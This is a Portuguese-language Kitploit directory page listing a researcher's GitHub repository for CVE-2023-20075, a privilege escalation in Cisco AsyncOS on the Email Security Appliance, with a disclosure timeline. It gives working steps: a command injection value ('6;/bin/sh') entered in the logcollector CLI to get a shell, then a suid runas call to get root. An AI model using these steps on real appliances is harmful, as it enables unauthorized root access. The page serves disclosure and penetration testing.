Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cisco-CVE-2023-20075 — Cisco Email Security Appliance: Escalação de Privilégios Local e Escape de Shell | Kitploit
Ferramentas/GitHubGitHub/ly1g3/cisco-cve-2023-20075
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHubly1g3/cisco-cve-2023-20075

cisco-CVE-2023-20075

Cisco Email Security Appliance: Escalação de Privilégios Local e Escape de Shell

Ver Repositório
110há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sobre

Pesquisador de segurança: ly1g3, ly1g3[at]tuta.io

Impressão digital GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Visão geral: Escalação de privilégio local e escape de shell

CVE: CVE-2023-20075

Cronograma:

  • Descoberto - ly1g3
  • Reportado - ly1g3
  • Corrigido - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email)

Escalação de privilégio - cli para shell root

Um usuário autenticado com acesso ao cli pode escalar privilégios para root e executar código arbitrário

Passos para o shell

  1. Do cli execute o comando logcollector
  2. Pressione 3
  3. Insira o valor: 6;/bin/sh
  4. Shell como usuário

Passos para root

  1. Do shell execute o binário suid runas
  2. /data/release/phoebe-14*/bin/runas 0 /bin/sh
  3. Shell como root
Baixar ferramenta